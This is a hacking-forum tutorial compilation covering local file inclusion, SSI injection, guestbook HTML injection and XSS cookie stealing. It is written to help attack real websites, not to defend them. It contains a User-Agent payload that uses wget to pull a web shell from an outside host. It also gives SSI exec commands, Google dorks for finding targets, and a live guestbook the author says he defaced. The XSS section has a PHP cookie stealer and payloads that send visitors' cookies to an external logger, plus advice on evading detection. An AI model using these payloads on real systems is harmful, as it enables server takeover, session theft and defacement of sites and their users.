LFI,RFI,SSI,XSS All in One Tutorial

1 – Introduction

In this tutorial I show you how to get a shell on websites using Local File Inclusion vulnerabilities and
injection malicious code in proc/self/environ.Is a step by step tutorial.

2 – Finding LFI

- Now we are going to find a Local File Inclusion vulnerable website.So we found our target,lets check it.
www.website.com/view.php?page=contact.php
- Now lets replace contact.php with ../ so the URL will become
www.website.com/view.php?page=../
and we got an error
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337
big chances to have a Local File Inclusion vulnerability.Let’s go to next step.

- Now lets check for etc/passwd to see the if is Local File Inclusion vulnerable.Lets make a request :
www.website.com/view.php?page=../../../etc/passwd
we got error and no etc/passwd file
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337
so we go more directories up
www.website.com/view.php?page=../../../../../etc/passwd
we succesfully included the etc/passwd file.
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin
3 – Checking if proc/self/environ is accessible

- Now lets see if proc/self/environ is accessible.We replace etc/passwd with proc/self/environ
www.website.com/view.php?page=../../../../../proc/self/environ
DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.website.com Port 80
proc/self/environ is accessible.If you got a blank page,an error proc/self/environ is not accessible or the OS is FreeBSD.

4 – Injecting malicious code

- Now let’s inject our malicious code in proc/self/environ.How we can do that?We can inject our code in User-Agent HTTP Header.
Use Tamper Data Addon for Firefox to change the User-Agent.Start Tamper Data in Firefox and request the URL :
www.website.com/view.php?page=../../../../../proc/self/environ
Choose Tamper and in User-Agent filed write the following code :
<?system(‘wget http://hack-bay.com/Shells/gny.txt -O shell.php’);?>
{The Unknown: the link of the shell used has expired, use the Link I posted at the end of this Thread} 

Then submit the request.

Our command will be executed (will download the txt shell from http://hack-bay.com/Shells/gny.txt {The Unknown: the link of the shell used has expired, use the Link I posted at the end of this Thread} and will save it as shell.php in the
website directory) through system(), and our shell will be created.If don’t work,try exec() because system() can be disabled on the webserver from php.ini.

5 – Access our shell

- Now lets check if our malicous code was successfully injected.Lets check if the shell is present.
www.website.com/shell.php
Our shell is there.Injection was succesfully. 

Most of the Credits goes to: Konvict from glitcheaven.com

SSI (Server Side Inclusion)

1- What is It?

A Server Side Include Attack is an Extremely Useful attack for executing commands on the server. You need basic knowledge of Bash or Batch to know what commands could help compromise the server to do this.

2- What Sites are Vulnerable?

For a site to be vulnerable to SSI Injection, Apache needs Server Side Includes aloud in the config file or the file extention must end in ‘.shtml’ ‘.shtm’ or ‘.stm’ both Apache, lighthttpd and IIS support SSI.

3- Testing for SSI Injection

To audit a site to check if it is vulnerable to SSI Injection you search all the directories for ‘.shtml’ ‘.shtm’ or ‘.stm’ extentions, if you find any then its probably enabled, if you dont find any it still may be enabled. It effects pages with unsanitized requests, (eg no filters, filtering < !–#exec …–>) To test you enter the following command into the request

< !–#exec cmd=”ls” –>

If you get a filesystem output appear then it is vulnerable, if the server is Windows replace the ‘ls’ for ‘dir’
You test for SSI the same way as XSS, you can post the command into
- Textboxes/search boxes
- Headers
- Cookies
- Address Bar

4- Useful Commands

-Show Files Linux

< !–#exec cmd=”ls” –>

-Show Files Windows

< !–#exec cmd=”dir” –>

-Read /etc/passwd

<!–#include virtual=”/etc/passwd” –>

-What User Is the webserver running on

< !–#exec cmd=”whoami” –>

-Download a shell to the server to get full control

< !–#exec cmd=”wget “shell.php”” –>

5- Dorks

Simillar to SQLi dorks, they get a list of sites that may or may not be vulnerable to SSI Injection
inurl:index.shtml
inurl:index.shtm
inurl:index.stm
Theres a few to start you off, but it is easy as pie to think of your own.

All credits goes to: http://doonstuntsmania.com/

HTMLi (HTML Injection)

1- HTML Injection or Guestbook Deface is a way how you can deface a guestbook.
So basicully you can post a "hacked" comment to Guestbook. Also you can add music and more...

2- How to do it?

Firstly, you need a dork.
We will use this one
guestbook.asp
1. Now just simply search that on Google and you'll find some guestbooks...
2. Pick one of the Guestbooks
3. Copy paste a html script (see bottom) as comment
4. Publish comment
5. Now, if it worked, it will show up as nice colorful text and some sexy music...
6. If it didn't work, search another guestbook and try again.

So this is pretty useless but funn

Here is btw the guestbook which I hacked...
http://www.furoreinn.it/en/guestbook.asp
All credits goes to: Tuhoaja from pvhax.com
And here is something you will need for RFI and LFI: C99 Shell: http://www.mediafire.com/?b3sl39jusygszc3 (it's in .php if you wanna change it to .txt you can just open it with notepad and that's it)
Hope you all liked it this Thread full of Tutorials,
Thanks for reading,

The Unknown.


XSS (Cross Site Scripting)
In this TuT I will be explaining the procedure of Cookie Stealing via XSS in simple steps. It can be applied on any website but in this TuT I will use this :http://www.TheUnknown.com/

Step one: Finding a XSS vulnerability

Now everyone who wanna learn cookie stealing via XSS all ready know this , so I won't explain it in detail here .

In here I will stick to GET variable XSS to make it easier.

Here's our PoC XSS vulnerability:
http://www.TheUnknown.com/search.php?query="><scblockedript>alert(123)</scblockedript>
When this page is loaded a message will pop up saying " 123 " this means we got our Vulnerability.


Step two: Setting up a cookie stealer

We will use PHP surely , here's an example of a simple cookie stealer :
<?php
$cookie = $HTTP_GET_VARS["cookie"];
$file = fopen('log.txt', 'a');
fwrite($file, $cookie . "nn");
fclose($file);
?>
( You can find lots of em all over HF all you have to do is to stick to the Search button on the top of the page )

There's lots of ways to log cookie as well , the best one in my opinion can be found here ( It is more Secure ): http://ccl.whiteacid.org/ .If you use yours it will be easy to track you down this is why we will use this one cose it also gives you an anonymous account with a random ID number instead of a username . For this TuT I will be using this ID : 123456 

Now lets check the service , and to do that , follow the link :
http://ccl.whiteacid.org/log.php?123456test_for_XSS.
As you see , THE ID MUST BE INCLUDED IN THE TEST URL . 
Now we login to http://ccl.whiteacid.org/ and see the new entry with our IP, referer, user agent and of course the data "test_for_XSS". The cookie logger works fine.


Step three: Logging a cookie

So we have a XSS vulnerability and we have a cookie logger. Now we just have to connect them to each other.

We make a new injection (instead of that alert thing) which sends the cookie data. It could look like this:
http://www.TheUnknown.com/search.php?query="><scblockedript>location.href = 'http://ccl.whiteacid.org/log.php?123456'+document.cookie;</scblockedript>
If the site doesn't use addslashes() or any other filters that mess up our injection, we have successfully captured the cookie and saved it in our account. From here, we can copy the users' cookies (most commonly the sessions) to our own cookies and get into their accounts...


Step four: Filter evasion

Let's say we encountered the following common problem: the target page uses addslashes() on the GET variable before printing it, which kills our injection by destroying our quotes. No problem, we just have to do it another way then.

We register a new account on a free hosting site (I'll use the FreeWebs.com ) and make a new scblockedript file there. I make a file called cookiesteal.js and give it the following content:
location.href = 'http://ccl.whiteacid.org/log.php?123456'+document.cookie;
Now we call the scblockedript through the XSS vulnerable page:
http://www.TheUnknown.com/search.php?query="><scblockedript src=http://www.freewebs.com/uber0n/cookiesteal.js>
Login to http://ccl.whiteacid.org once again and you'll see the new entry. However, remember NOT to register the account on the hosting site with your normal nickname and make sure you register using a good proxy so that you can't be tracked. You can also ask XSSed.com to host your scblockedript files.

If you encounter other filters than addslashes, try running the scblockedripts through iframes, images etc.



Thanks for reading , Enjoy